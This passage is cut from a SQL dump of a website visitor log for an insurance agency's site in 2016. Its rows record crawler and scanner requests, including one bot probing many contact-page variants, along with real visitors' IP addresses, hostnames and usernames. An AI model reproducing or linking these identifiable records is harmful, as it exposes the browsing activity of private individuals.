+http://megaindex.com/crawler)','','',0,'','','de','','','','','','','3','0',0),(3009,'0b_4c0fc6a7b41095e44d8f53c24009e08a','1457609832','5.9.98.130','static.130.98.9.5.clients.your-server.de','/case-success-companion-life-chronic-illness-rider-saves-ltc-decline/','Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)','','',0,'','','de','','','','','','','3','0',0),(3010,'0b_4c0fc6a7b41095e44d8f53c24009e08a','1457609834','5.9.98.130','static.130.98.9.5.clients.your-server.de','/?page_id=171?a=pwdreset','Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)','','',0,'','','de','','','','','','','3','0',0),(3012,'0b_4c0fc6a7b41095e44d8f53c24009e08a','1457609837','5.9.98.130','static.130.98.9.5.clients.your-server.de','/?page_id=169','Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)','','',0,'','','de','','','','','','','3','0',0),(3013,'0b_4c0fc6a7b41095e44d8f53c24009e08a','1457609839','5.9.98.130','static.130.98.9.5.clients.your-server.de','/about-us/meet-the-eib-team/','Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)','','',0,'','','de','','','','','','','3','0',0),(3015,'0b_4c0fc6a7b41095e44d8f53c24009e08a','1457609841','5.9.98.130','static.130.98.9.5.clients.your-server.de','/members/','Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)','','',0,'','','de','','','','','','','3','0',0),(3018,'0b_4c0fc6a7b41095e44d8f53c24009e08a','1457609844','5.9.98.130','static.130.98.9.5.clients.your-server.de','/meet-the-eib-team/','Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)','','',0,'','','de','','','','','','','3','0',0),(3019,'0b_1bb3d5fe8767a3e570f8c1b40534706f','1457612634','66.249.73.187','crawl-66-249-73-187.googlebot.com','/case-success-companion-life-chronic-illness-rider-saves-ltc-decline/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(3021,'0b_a65976900074b4b9a33c13e95dfef68a','1457617131','52.27.34.194','ec2-52-27-34-194.us-west-2.compute.amazonaws.com','/robots.txt','Mozilla/5.0 (compatible; DomainAppender /1.0; +http://www.profound.net/domainappender)','','',0,'','','','','','Unknown Spider','','','','0','0',0),(3022,'0b_a65976900074b4b9a33c13e95dfef68a','1457617131','52.27.34.194','ec2-52-27-34-194.us-west-2.compute.amazonaws.com','/robots.txt','Mozilla/5.0 (compatible; DomainAppender /1.0; +http://www.profound.net/domainappender)','','',0,'','','','','','Unknown Spider','','','','0','0',0),(3025,'0b_a65976900074b4b9a33c13e95dfef68a','1457617132','52.27.34.194','ec2-52-27-34-194.us-west-2.compute.amazonaws.com','/','Mozilla/5.0 (compatible; DomainAppender /1.0; +http://www.profound.net/domainappender)','','',0,'','','','','','','','','','0','0',0),(3027,'0b_a65976900074b4b9a33c13e95dfef68a','1457617189','52.27.34.194','ec2-52-27-34-194.us-west-2.compute.amazonaws.com','/about-us/','Mozilla/5.0 (compatible; DomainAppender /1.0; +http://www.profound.net/domainappender)','','',0,'','','','','','','','','','0','0',0),(3028,'0b_a65976900074b4b9a33c13e95dfef68a','1457617190','52.27.34.194','ec2-52-27-34-194.us-west-2.compute.amazonaws.com','/contact/','Mozilla/5.0 (compatible; DomainAppender /1.0; +http://www.profound.net/domainappender)','','',0,'','','','','','','','','','0','0',0),(3030,'0b_b0b0c283307affb06ddcbb37f28eb395','1457618033','66.249.73.202','crawl-66-249-73-202.googlebot.com','/robots.txt','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(3033,'0b_4c1d2b4e159c2019b919ea23471b79a5','1457618034','66.249.73.194','crawl-66-249-73-194.googlebot.com','/','Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'iPhone OS','','','','','Googlebot-Mobile','','','','0','0',0),(3036,'0b_4c1d2b4e159c2019b919ea23471b79a5','1457618035','66.249.73.178','crawl-66-249-73-178.googlebot.com','/robots.txt','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(3037,'0b_20379c684d6b4a43af8b176f5045be5b','1457619199','206.253.226.18','206.253.226.18','/robots.txt','Mozilla/5.0 (compatible; oBot/2.3.1; +http://filterdb.iss.net/crawler/)','','',0,'','','','','','Unknown Spider','','','','0','0',0),(3040,'0b_8ae560c4c64cc40c7b15fa4343513fce','1457619583','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','roisy','','0','0',0),(3042,'0b_8ae560c4c64cc40c7b15fa4343513fce','1457619585','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','roisy','','0','0',0),(3043,'0b_8ae560c4c64cc40c7b15fa4343513fce','1457621781','108.58.88.178','ool-6c3a58b2.static.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','roisy','','0','0',0),(3045,'0b_ea2baff952f58c0de8ab946c98b45c67','1457621792','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','','',0,'Win7','Chrome 48','us','','','','','roisy','','0','0',0),(3048,'0b_ea2baff952f58c0de8ab946c98b45c67','1457621794','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 48','us','','','','','roisy','','0','0',0),(3049,'0b_da15aa7be695a58b8e579b0ecca27a63','1457622146','109.206.157.10','pool.ip-home.net','/','','','',0,'','','','','','Unknown Spider','','','','0','0',0),(3052,'0b_4164d4d0a5e9b090f0c8ca704aeeb0a8','1457622397','66.249.83.213,209.64.152.62','209.64.152.62','/','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 Google Favicon','','',0,'Linux','Google Chrome','','','','','','','','0','0',0),(3054,'0b_a5f773947cbdab6e9270c5521e30deaf','1457623752','40.77.167.66','msnbot-40-77-167-66.search.msn.com','/?page_id=171?a=pwdreset','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(3055,'0b_6a87f0414f6c97e3179c9ea6cea55b60','1457624706','173.227.86.62','trinicom.com','/','','','',0,'','','','','','Unknown Spider','','','','3','0',0),(3057,'0b_6a87f0414f6c97e3179c9ea6cea55b60','1457624720','173.227.86.62','trinicom.com','/Contact.htm','','','',0,'','','','','','Unknown Spider','','','','3','0',0),(3060,'0b_6a87f0414f6c97e3179c9ea6cea55b60','1457624721','173.227.86.62','trinicom.com','/contact.htm','','','',0,'','','','','','Unknown Spider','','','','3','0',0),(3063,'0b_6a87f0414f6c97e3179c9ea6cea55b60','1457624722','173.227.86.62','trinicom.com','/Contact.html','','','',0,'','','','','','Unknown Spider','','','','3','0',0),(3064,'0b_6a87f0414f6c97e3179c9ea6cea55b60','1457624723','173.227.86.62','trinicom.com','/Contact.html','','','',0,'','','','','','Unknown Spider','','','','3','0',0),(3067,'0b_6a87f0414f6c97e3179c9ea6cea55b60','1457624723','173.227.86.62','trinicom.com','/contact.html','','','',0,'','','','','','Unknown Spider','','','','3','0',0),(3069,'0b_6a87f0414f6c97e3179c9ea6cea55b60','1457624724','173.227.86.62','trinicom.com','/contact.html','','','',0,'','','','','','Unknown Spider','','','','3','0',0),(3070,'0b_6a87f0414f6c97e3179c9ea6cea55b60','1457624724','173.227.86.62','trinicom.com','[404] /Contact.asp','','','',0,'','','','','','Unknown Spider','','','','3','0',0),(3072,'0b_6a87f0414f6c97e3179c9ea6cea55b60','1457624725','173.227.86.62','trinicom.com','[404] /Contact.asp','','','',0,'','','','','','Unknown Spider','','','','3','0',0),(3075,'0b_6a87f0414f6c97e3179c9ea6cea55b60','1457624725','173.227.86.62','trinicom.com','[404] /contact.asp','','','',0,'','','','','','Unknown Spider','','','','3','0',0),(3076,'0b_6a87f0414f6c97e3179c9ea6cea55b60','1457624726','173.227.86.62','trinicom.com','[404] /contact.asp','','','',0,'','','','','','Unknown Spider','','','','3','0',0),(3079,'0b_6a87f0414f6c97e3179c9ea6cea55b60','1457624727','173.227.86.62','trinicom.com','[404] /Contact.aspx','','','',0,'','','','','','Unknown Spider','','','','3','0',0),(3082,'0b_6a87f0414f6c97e3179c9ea6cea55b60','1457624728','173.227.86.62','trinicom.com','[404] /contact.aspx','','','',0,'','','','','','Unknown Spider','','','','3','0',0),(3085,'0b_6a87f0414f6c97e3179c9ea6cea55b60','1457624729','173.227.86.62','trinicom.com','/contact.PHP','','','',0,'','','','','','Unknown Spider','','','','3','0',0),(3088,'0b_6a87f0414f6c97e3179c9ea6cea55b60','1457624731','173.227.86.62','trinicom.com','/contact.shtml','','','',0,'','','','','','Unknown Spider','','','','3','0',0),(3091,'0b_6a87f0414f6c97e3179c9ea6cea55b60','1457624732','173.227.86.62','trinicom.com','/contact.shtml','','','',0,'','','','','','Unknown Spider','','','','3','0',0),(3093,'0b_6a87f0414f6c97e3179c9ea6cea55b60','1457624734','173.227.86.62','trinicom.com','/ContactUs.htm','','','',0,'','','','','','Unknown Spider','','','','3','0',0),(3094,'0b_6a87f0414f6c97e3179c9ea6cea55b60','1457624735','173.227.86.62','trinicom.com','/contactus.htm','','','',0,'','','','','','Unknown Spider','','','','3','0',0),(3097,'0b_6a87f0414f6c97e3179c9ea6cea55b60','1457624736','173.227.86.62','trinicom.com','/ContactUs.html','','','',0,'','','','','','Unknown Spider','','','','3','0',0),(3100,'0b_6a87f0414f6c97e3179c9ea6cea55b60','1457624737','173.227.86.62','trinicom.com','/contactus.html','','','',0,'','','','','','Unknown Spider','','','','3','0',0),(3102,'0b_6a87f0414f6c97e3179c9ea6cea55b60','1457624738','173.227.86.62','trinicom.com','[404] /ContactUs.asp','','','',0,'','','','','','Unknown Spider','','','','3','0',0),(3103,'0b_6a87f0414f6c97e3179c9ea6cea55b60','1457624739','173.227.86.62','trinicom.com','[404] /ContactUs.asp','','','',0,'','','','','','Unknown Spider','','','','3','0',0),(3106,'0b_6a87f0414f6c97e3179c9ea6cea55b60','1457624739','173.227.86.62','trinicom.com','[404] /contactus.asp','','','',0,'','','','','','Unknown Spider','','','','3','0',0),(3108,'0b_6a87f0414f6c97e3179c9ea6cea55b60','1457624740','173.227.86.62','trinicom.com','[404] /contactus.asp','','','',0,'','','','','','Unknown Spider','','','','3','0',0),(3109,'0b_6a87f0414f6c97e3179c9ea6cea55b60','1457624741','173.227.86.62','trinicom.com','[404] /ContactUs.aspx','','','',0,'','','','','','Unknown Spider','','','','3','0',0),(3111,'0b_6a87f0414f6c97e3179c9ea6cea55b60','1457624742','173.227.86.62','trinicom.com','[404] /contactus.aspx','','','',0,'','','','','','Unknown Spider','','','','3','0',0),(3112,'0b_6a87f0414f6c97e3179c9ea6cea55b60','1457624743','173.227.86.62','trinicom.com','/contactus.PHP','','','',0,'','','','','','Unknown Spider','','','','3','0',0),(3114,'0b_6a87f0414f6c97e3179c9ea6cea55b60','1457624745','173.227.86.62','trinicom.com','/contactus.shtml','','','',0,'','','','','','Unknown Spider','','','','3','0',0),(3117,'0b_6a87f0414f6c97e3179c9ea6cea55b60','1457624746','173.227.86.62','trinicom.com','/contactus.shtml','','','',0,'','','','','','Unknown Spider','','','','3','0',0),(3120,'0b_6a87f0414f6c97e3179c9ea6cea55b60','1457624749','173.227.86.62','trinicom.com','/Contact-Us.htm','','','',0,'','','','','','Unknown Spider','','','','3','0',0),(3123,'0b_6a87f0414f6c97e3179c9ea6cea55b60','1457624750','173.227.86.62','trinicom.com','/contact-us.htm','','','',0,'','','','','','Unknown Spider','','','','3','0',0),(3126,'0b_6a87f0414f6c97e3179c9ea6cea55b60','1457624751','173.227.86.62','trinicom.com','/Contact-Us.html','','','',0,'','','','','','Unknown Spider','','','','3','0',0),(3129,'0b_6a87f0414f6c97e3179c9ea6cea55b60','1457624752','173.227.86.62','trinicom.com','/Contact-Us.html','','','',0,'','','','','','Unknown Spider','','','','3','0',0),(3130,'0b_6a87f0414f6c97e3179c9ea6cea55b60','1457624752','173.227.86.62','trinicom.com','/contact-us.html','','','',0,'','','','','','Unknown Spider','','','','3','0',0),(3132,'0b_6a87f0414f6c97e3179c9ea6cea55b60','1457624753','173.227.86.62','trinicom.com','/contact-us.html','','','',0,'','','','','','Unknown Spider','','','','3','0',0),(3133,'0b_6a87f0414f6c97e3179c9ea6cea55b60','1457624753','173.227.86.62','trinicom.com','[404] /Contact-Us.asp','','','',0,'','','','','','Unknown Spider','','','','3','0',0),(3136,'0b_6a87f0414f6c97e3179c9ea6cea55b60','1457624754','173.227.86.62','trinicom.com','[404] /Contact-Us.asp','','','',0,'','','','','','Unknown Spider','','','','3','0',0),(3139,'0b_6a87f0414f6c97e3179c9ea6cea55b60','1457624755','173.227.86.62','trinicom.com','[404] /contact-us.asp','','','',0,'','','','','','Unknown Spider','','','','3','0',0),(3142,'0b_6a87f0414f6c97e3179c9ea6cea55b60','1457624756','173.227.86.62','trinicom.com','[404] /Contact-Us.aspx','','','',0,'','','','','','Unknown Spider','','','','3','0',0),(3144,'0b_6a87f0414f6c97e3179c9ea6cea55b60','1457624757','173.227.86.62','trinicom.com','[404] /contact-us.aspx','','','',0,'','','','','','Unknown Spider','','','','3','0',0),(3147,'0b_6a87f0414f6c97e3179c9ea6cea55b60','1457624759','173.227.86.62','trinicom.com','/contact-us.PHP','','','',0,'','','','','','Unknown Spider','','','','3','0',0),(3150,'0b_6a87f0414f6c97e3179c9ea6cea55b60','1457624762','173.227.86.62','trinicom.com','/contact-us.shtml','','','',0,'','','','','','Unknown Spider','','','','3','0',0),(3153,'0b_6a87f0414f6c97e3179c9ea6cea55b60','1457624763','173.227.86.62','trinicom.com','/contact-us.shtml','','','',0,'','','','','','Unknown Spider','','','','3','0',0),(3154,'0b_6a87f0414f6c97e3179c9ea6cea55b60','1457624765','173.227.86.62','trinicom.com','/Contact_Us.htm','','','',0,'','','','','','Unknown Spider','','','','3','0',0),(3157,'0b_6a87f0414f6c97e3179c9ea6cea55b60','1457624766','173.227.86.62','trinicom.com','/Contact_Us.htm','','','',0,'','','','','','Unknown Spider','','','','3','0',0),(3160,'0b_6a87f0414f6c97e3179c9ea6cea55b60','1457624766','173.227.86.62','trinicom.com','/contact_us.htm','','','',0,'','','','','','Unknown Spider','','','','3','0',0),(3163,'0b_6a87f0414f6c97e3179c9ea6cea55b60','1457624767','173.227.86.62','trinicom.com','/contact_us.htm','','','',0,'','','','','','Unknown Spider','','','','3','0',0),(3166,'0b_6a87f0414f6c97e3179c9ea6cea55b60','1457624767','173.227.86.62','trinicom.com','/Contact_Us.html','','','',0,'','','','','','Unknown Spider','','','','3','0',0),(3169,'0b_6a87f0414f6c97e3179c9ea6cea55b60','1457624768','173.227.86.62','trinicom.com','/Contact_Us.html','','','',0,'','','','','','Unknown Spider','','','','3','0',0),(3172,'0b_6a87f0414f6c97e3179c9ea6cea55b60','1457624769','173.227.86.62','trinicom.com','/contact_us.html','','','',0,'','','','','','Unknown Spider','','','','3','0',0),(3174,'0b_6a87f0414f6c97e3179c9ea6cea55b60','1457624770','173.227.86.62','trinicom.com','[404] /Contact_Us.asp','','','',0,'','','','','','Unknown Spider','','','','3','0',0),(3177,'0b_6a87f0414f6c97e3179c9ea6cea55b60','1457624771','173.227.86.62','trinicom.com','[404] /contact_us.asp','','','',0,'','','','','','Unknown Spider','','','','3','0',0),(3180,'0b_6a87f0414f6c97e3179c9ea6cea55b60','1457624772','173.227.86.62','trinicom.com','[404] /Contact_Us.aspx','','','',0,'','','','','','Unknown Spider','','','','3','0',0),(3181,'0b_6a87f0414f6c97e3179c9ea6cea55b60','1457624773','173.227.86.62','trinicom.com','[404] /contact_us.aspx','','','',0,'','','','','','Unknown Spider','','','','3','0',0),(3183,'0b_6a87f0414f6c97e3179c9ea6cea55b60','1457624774','173.227.86.62','trinicom.com','[404] /contact_us.aspx','','','',0,'','','','','','Unknown Spider','','','','3','0',0),(3186,'0b_6a87f0414f6c97e3179c9ea6cea55b60','1457624775','173.227.86.62','trinicom.com','/contact_us.PHP','','','',0,'','','','','','Unknown Spider','','','','3','0',0),(3189,'0b_6a87f0414f6c97e3179c9ea6cea55b60','1457624777','173.227.86.62','trinicom.com','/contact_us.shtml','','','',0,'','','','','','Unknown Spider','','','','3','0',0),(3190,'0b_6a87f0414f6c97e3179c9ea6cea55b60','1457624778','173.227.86.62','trinicom.com','/contact_us.shtml','','','',0,'','','','','','Unknown Spider','','','','3','0',0),(3192,'0b_6a87f0414f6c97e3179c9ea6cea55b60','1457624779','173.227.86.62','trinicom.com','/Requestinfo.htm','','','',0,'','','','','','Unknown Spider','','','','3','0',0),(3195,'0b_6a87f0414f6c97e3179c9ea6cea55b60','1457624780','173.227.86.62','trinicom.com','/Requestinfo.htm','','','',0,'','','','','','Unknown Spider','','','','3','0',0),(3196,'0b_6a87f0414f6c97e3179c9ea6cea55b60','1457624781','173.227.86.62','trinicom.com','/requestinfo.htm','','','',0,'','','','','','Unknown Spider','','','','3','0',0),(3199,'0b_6a87f0414f6c97e3179c9ea6cea55b60','1457624782','173.227.86.62','trinicom.com','/Requestinfo.html','','','',0,'','','','','','Unknown Spider','','','','3','0',0),(3202,'0b_6a87f0414f6c97e3179c9ea6cea55b60','1457624783','173.227.86.62','trinicom.com','/Requestinfo.html','','','',0,'','','','','','Unknown Spider','','','','3','0',0),(3204,'0b_6a87f0414f6c97e3179c9ea6cea55b60','1457624783','173.227.86.62','trinicom.com','/requestinfo.html','','','',0,'','','','','','Unknown Spider','','','','3','0',0),(3205,'0b_6a87f0414f6c97e3179c9ea6cea55b60','1457624784','173.227.86.62','trinicom.com','/requestinfo.html','','','',0,'','','','','','Unknown Spider','','','','3','0',0),(3208,'0b_6a87f0414f6c97e3179c9ea6cea55b60','1457624784','173.227.86.62','trinicom.com','[404] /Requestinfo.asp','','','',0,'','','','','','Unknown Spider','','','','3','0',0),(3211,'0b_6a87f0414f6c97e3179c9ea6cea55b60','1457624785','173.227.86.62','trinicom.com','[404] /Requestinfo.asp','','','',0,'','','','','','Unknown Spider','','','','3','0',0),(3214,'0b_6a87f0414f6c97e3179c9ea6cea55b60','1457624785','173.227.86.62','trinicom.com','[404] /requestinfo.asp','','','',0,'','','','','','Unknown Spider','','','','3','0',0),(3216,'0b_6a87f0414f6c97e3179c9ea6cea55b60','1457624786','173.227.86.62','trinicom.com','[404] /requestinfo.asp','','','',0,'','','','','','Unknown Spider','','','','3','0',0),(3217,'0b_6a87f0414f6c97e3179c9ea6cea55b60','1457624786','173.227.86.62','trinicom.com','[404] /Requestinfo.aspx','','','',0,'','','','','','Unknown Spider','','','','3','0',0),(3220,'0b_6a87f0414f6c97e3179c9ea6cea55b60','1457624787','173.227.86.62','trinicom.com','[404] /Requestinfo.aspx','','','',0,'','','','','','Unknown Spider','','','','3','0',0),(3223,'0b_6a87f0414f6c97e3179c9ea6cea55b60','1457624788','173.227.86.62','trinicom.com','[404] /requestinfo.aspx','','','',0,'','','','','','Unknown Spider','','','','3','0',0),(3226,'0b_6a87f0414f6c97e3179c9ea6cea55b60','1457624789','173.227.86.62','trinicom.com','/requestinfo.PHP','','','',0,'','','','','','Unknown Spider','','','','3','0',0),(3228,'0b_6a87f0414f6c97e3179c9ea6cea55b60','1457624792','173.227.86.62','trinicom.com','/requestinfo.shtml','','','',0,'','','','','','Unknown Spider','','','','3','0',0),(3231,'0b_10fd90f995e7ee156c834c01832d41db','1457625811','69.175.67.58','newscan04.sitelock.com','/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(3234,'0b_10fd90f995e7ee156c834c01832d41db','1457625815','69.175.67.58','newscan04.sitelock.com','/th1s_1s_a_4o4.html','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(3235,'0b_10fd90f995e7ee156c834c01832d41db','1457625818','69.175.67.58','newscan04.sitelock.com','/agent-tools/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(3238,'0b_9c54e5e10ea73a15541e8184da0c3d49','1457626086','136.243.172.46','static.46.172.243.136.clients.your-server.de','/','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36','','',0,'Win7','Chrome 41','de','','','','','','','0','0',0),(3240,'0b_bb5034eb57245ee98644fa0b76f5a96b','1457627033','54.164.156.99','ec2-54-164-156-99.compute-1.amazonaws.com','/','python-requests/2.9.1','','',0,'','','','','','python','','','','0','0',0),(3241,'0b_c9c23d7b5425efc43f698839cac25b9e','1457627425','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','','',0,'Win7','Chrome 48','us','1920 x 1080','','','','','','0','0',0),(3243,'0b_c9c23d7b5425efc43f698839cac25b9e','1457627425','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','','',0,'Win7','Chrome 48','us','1920 x 1080','','','','','','0','0',0),(3244,'0b_c9c23d7b5425efc43f698839cac25b9e','1457627426','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','','','0','0',0),(3246,'0b_f63b775820e423ca1c520c3e5eddcf71','1457627501','180.76.15.7','baiduspider-180-76-15-7.crawl.baidu.com','/agent-tools/','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','us','','','Baiduspider','','','','0','0',0),(3247,'0b_c9c23d7b5425efc43f698839cac25b9e','1457627521','108.58.88.178','ool-6c3a58b2.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','','','0','0',0),(3249,'0b_c9c23d7b5425efc43f698839cac25b9e','1457627538','108.58.88.178','ool-6c3a58b2.static.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','Chaya','','0','51',0),(3250,'0b_ce2db0f0602af689bc0be8fc61316db7','1457628095','66.249.83.217,75.99.37.250','ool-4b6325fa.static.optonline.net','/','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 Google Favicon','','',0,'Linux','Google Chrome','','','','','','','','0','0',0),(3252,'0b_c5bdc16a7ff2a9b83809a91dd88c61a9','1457628134','208.115.113.83','208.115.113.83','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(3255,'0b_c9c23d7b5425efc43f698839cac25b9e','1457628164','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','','',0,'Win7','Chrome 48','us','1920 x 1080','','','','Chaya','','0','51',0),(3256,'0b_c9c23d7b5425efc43f698839cac25b9e','1457628165','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','Chaya','','0','0',0),(3259,'0b_c9c23d7b5425efc43f698839cac25b9e','1457628187','108.58.88.178','ool-6c3a58b2.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','Chaya','','0','51',0),(3261,'0b_c9c23d7b5425efc43f698839cac25b9e','1457628193','108.58.88.178','ool-6c3a58b2.static.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','Chaya','','0','51',0),(3262,'0b_c36d888df3202fdc7a035d7f8d40ec52','1457628266','208.125.14.78','rrcs-208-125-14-78.nyc.biz.rr.com','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','','',0,'Win7','Chrome 48','us','1920 x 1080','','','','abrahammermelstein','','0','0',0),(3264,'0b_c36d888df3202fdc7a035d7f8d40ec52','1457628268','208.125.14.78','rrcs-208-125-14-78.nyc.biz.rr.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','abrahammermelstein','','0','0',0),(3267,'0b_de0573041e4d96bbdecdda061dd8cae1','1457628330','31.16.43.186','ip1f102bba.dynamic.kabel-deutschland.de','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(3270,'0b_de0573041e4d96bbdecdda061dd8cae1','1457628332','31.16.43.186','ip1f102bba.dynamic.kabel-deutschland.de','/?a=pwdreset','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(3273,'0b_8c53878c27e86bc0e2bb4a1564a93e4c','1457630037','184.152.67.250','cpe-184-152-67-250.nyc.res.rr.com','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','https://www.google.com/','_notprovided_',1,'Win7','Chrome 48','us','','Google','','','','','0','0',0),(3276,'0b_8c53878c27e86bc0e2bb4a1564a93e4c','1457630040','184.152.67.250','cpe-184-152-67-250.nyc.res.rr.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 48','us','','','','','','','0','0',0),(3279,'0b_99e70a8ad41c3b11d9d101d7eeb200a5','1457630061','198.167.168.70','198.167.168.70','/','Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.bing.com/search?q=enpire+insurance&src=IE-TopResult&FORM=IETR02','enpire insurance',1,'Win7 x64','IE 10','us','1120 x 700','Bing','','','','','0','0',0),(3280,'0b_99e70a8ad41c3b11d9d101d7eeb200a5','1457630063','198.167.168.70','198.167.168.70','/','Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.bing.com/search?q=enpire+insurance&src=IE-TopResult&FORM=IETR02','enpire insurance',1,'Win7 x64','IE 10','us','1120 x 700','Bing','','','','','0','0',0),(3283,'0b_99e70a8ad41c3b11d9d101d7eeb200a5','1457630159','198.167.168.70','198.167.168.70','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.empireins.com/','',0,'Win7 x64','IE 10','us','1120 x 700','','','','','','0','0',0),(3285,'0b_99e70a8ad41c3b11d9d101d7eeb200a5','1457630189','198.167.168.70','198.167.168.70','/about-us/','Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 